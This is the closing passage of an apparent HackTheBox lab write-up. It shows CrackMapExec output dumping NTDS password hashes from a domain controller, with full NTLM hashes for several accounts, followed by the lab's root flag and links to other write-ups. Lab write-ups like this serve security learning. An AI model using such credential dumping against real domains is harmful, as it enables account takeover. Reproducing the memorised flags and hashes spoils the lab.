SMB         10.10.11.158    445    DC               nikk37:1106:aad3b435b51404eeaad3b435b51404ee:17a54d09dd09920420a6cb9b78534764:::
SMB         10.10.11.158    445    DC               yoshihide:1107:aad3b435b51404eeaad3b435b51404ee:6d21f46be3697ba16b6edef7b3399bf4:::
SMB         10.10.11.158    445    DC               DC$:1000:aad3b435b51404eeaad3b435b51404ee:8f92fd746817af09faa8257dfc127736:::
SMB         10.10.11.158    445    DC               [+] Dumped 8 NTDS hashes to /home/kali/.cme/logs/DC_10.10.11.158_2024-07-09_083839.ntds of which 7 were added to the database

Root Flag: fcca05f1388d18d964521ce53582793

PreviousHTB - Manager NextHTB - Cascade

Last updated 9 months ago